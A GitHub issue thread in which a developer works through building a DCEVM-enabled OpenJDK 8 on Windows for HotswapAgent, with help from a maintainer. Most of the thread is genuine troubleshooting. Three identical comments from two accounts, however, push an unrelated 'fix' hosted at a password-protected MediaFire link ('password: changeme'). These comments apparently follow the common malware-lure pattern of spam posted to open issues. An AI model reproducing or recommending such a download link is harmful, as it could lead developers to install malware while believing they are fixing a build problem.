### ISSUE TITLE
How to use HotswapAgent with Java 8? 

### ISSUE THREAD

**Issue by homejim** [HotswapProjects/HotswapAgent#578]
How to use hotswap with Java 8? Since Oracle JDK 8 requires using an exe installer, I don't plan to use it. I tried using [TravaOpenJDK/trava-jdk-8-dcevm](https://github.com/TravaOpenJDK/trava-jdk-8-dcevm) to install it, but the installation was unsuccessful.

@skybber Do you know how to solve this?

**Comment by homejim** [comment]
I encountered an error while using [TravaOpenJDK/trava-jdk-8-dcevm](https://github.com/TravaOpenJDK/trava-jdk-8-dcevm) to install JDK 8.

`$ sh build_windows.sh
build_windows.sh: line 3: wget: command not found
build_windows.sh: line 4: wget: command not found
zipinfo:  cannot find or open OpenJDK8_x64_Windows.zip, OpenJDK8_x64_Windows.zip.zip or OpenJDK8_x64_Windows.zip.ZIP.
unzip:  cannot find or open OpenJDK8_x64_Windows.zip, OpenJDK8_x64_Windows.zip.zip or OpenJDK8_x64_Windows.zip.ZIP.
mv: cannot stat 'freetype.zip': No such file or directory
unzip:  cannot find or open freetype.zip, freetype.zip.zip or freetype.zip.ZIP.
build_windows.sh: line 26: ./makejdk-any-platform.sh: No such file or directory`

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by skybber** [comment]
@homejim there is TravaBuild build https://github.com/TravaOpenJDK/trava-jdk-8-dcevm/releases/tag/dcevm8u282b08, you've used build script.

**Comment by homejim** [comment]
> @homejim there is TravaBuild build https://github.com/TravaOpenJDK/trava-jdk-8-dcevm/releases/tag/dcevm8u282b08, you've used build script.

https://api.adoptopenjdk.net/v2/binary/releases/openjdk8?openjdk_impl=hotspot&os=windows&arch=x64&release=latest&type=jdk

Is this link invalid? I can't download it.

**Comment by homejim** [comment]
Could you add a GitHub Action similar to the one at https://github.com/TravaOpenJDK/trava-jdk-11-dcevm/blob/master/.github/workflows/manually.yml for the release at https://github.com/TravaOpenJDK/trava-jdk-8-dcevm/releases/tag/dcevm8u282b08?

**Comment by homejim** [comment]
> > @homejim there is TravaBuild build https://github.com/TravaOpenJDK/trava-jdk-8-dcevm/releases/tag/dcevm8u282b08, you've used build script.
> 
> https://api.adoptopenjdk.net/v2/binary/releases/openjdk8?openjdk_impl=hotspot&os=windows&arch=x64&release=latest&type=jdk
> 
> Is this link invalid? I can't download it. Could you add a GitHub Action similar to the one at https://github.com/TravaOpenJDK/trava-jdk-11-dcevm/blob/master/.github/workflows/manually.yml for the release at https://github.com/TravaOpenJDK/trava-jdk-8-dcevm/releases/tag/dcevm8u282b08?

@skybber I tried, but it failed. Do you know how to build JDK 8 with DCEVM included?

**Comment by skybber** [comment]
I've build 

https://github.com/HotswapProjects/openjdk-jdk8u-dcevm

for Linux in the past. We have also build it on Travis, when the Travis was working.... As far as windows, I think we had problems with build enviroment and I'm not sure if we had working windows/Travis build. I would suggest you to study 

https://github.com/TravaOpenJDK/temurin-build-dcevm

it is Temurin build script modified for dcevm. It is pretty old now, but it can work. May be you can try current Temurin build scripts for jdk8.

**Comment by homejim** [comment]
> I've build
> 
> https://github.com/HotswapProjects/openjdk-jdk8u-dcevm
> 
> for Linux in the past. We have also built it on Travis, when the Travis was working.... As far as windows, I think we had problems with build enviroment and I'm not sure if we had working windows/Travis build. I would suggest you to study
> 
> https://github.com/TravaOpenJDK/temurin-build-dcevm
> 
> it is Temurin build script modified for dcevm. It is pretty old now, but it can work. May be you can try current Temurin build scripts for jdk8.

THX

**Comment by homejim** [comment]
@skybber I have successfully compiled OpenJDK 8 for Windows with DCEVM. However, when running with this JDK and using the -XXaltjvm=dcevm parameter, I encounter the following error:

Error: missing 'dcevm' JVM at 'D:\jdk\openjdk-jdk8u-dcevm-dcevm8u232b09\build\windows-x86_64-normal-server-fastdebug\jdk\bin\dcevm\jvm.dll'.

If I do not use the -XXaltjvm=dcevm parameter, it runs normally. When I modify the code, I can achieve a similar reload effect as with the DCEVM JDK。

Additionally, there is another issue where this JDK runs slower than other JDKs. This is the case even without using the dcevm javaagent

**Comment by homejim** [comment]
> @skybber I have successfully compiled OpenJDK 8 for Windows with DCEVM. However, when running with this JDK and using the `-XXaltjvm=dcevm` parameter, I encounter the following error:
> 
> `Error: missing 'dcevm' JVM at 'D:\jdk\openjdk-jdk8u-dcevm-dcevm8u232b09\build\windows-x86_64-normal-server-fastdebug\jdk\bin\dcevm\jvm.dll'.`
> 
> If I do not use the `-XXaltjvm=dcevm` parameter, it runs normally. When I modify the code, I can achieve a similar reload effect as with the DCEVM JDK。
> 
> Additionally, there is another issue where this JDK runs slower than other JDKs. This is the case even without using the dcevm javaagent

The reason it's slow is because the debug parameter is enabled. After recompiling the release version of the JDK, it should work. However, there's still no need to add the XXaltjvm=dcevm parameter.

**Comment by skybber** [comment]
Great to hear that you've managed to compile it on Windows — it's not an easy task! Regarding -XXaltjvm, we've integrated DCEVM directly into JDK 8. So if you're building from [this repository](https://github.com/HotswapProjects/openjdk-jdk8u-dcevm), there's no need to use the old -XXaltjvm parameter anymore.

**Comment by homejim** [comment]
> Great to hear that you've managed to compile it on Windows — it's not an easy task! Regarding -XXaltjvm, we've integrated DCEVM directly into JDK 8. So if you're building from [this repository](https://github.com/HotswapProjects/openjdk-jdk8u-dcevm), there's no need to use the old -XXaltjvm parameter anymore.

Thanks for your help
